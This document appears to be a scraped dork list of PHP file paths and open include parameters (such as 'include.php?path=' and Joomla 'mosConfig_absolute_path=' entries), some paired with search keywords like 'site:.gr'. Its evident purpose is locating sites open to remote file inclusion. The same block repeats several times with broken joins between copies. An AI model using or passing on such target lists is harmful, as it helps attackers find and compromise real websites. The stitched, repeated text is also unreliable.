standard.php?viewpage=
standard.php?pr=
*inc*.php?showpage=
pagina.php?ref=
path.php?pname=
padrao.php?mid=
info.php?eval=
include.php?path=
page.php?subject=
sub*.php?qry=
head.php?module=
nota.php?opcion=
head.php?abre=
base.php?str=
home.php?bOdy=
gery.php?module=
head.php?sivu=
page.php?inc=
pagina.php?header=
mod*.php?v=
home.php?doshow=
padrao.php?n=
index1.php?chapter=
padrao.php?basepath=
index.php?r=
index3.php?seccion=
sitio.php?mid=
index.php?where=
general.php?type=

pagina.php?goto=
page.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php

path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
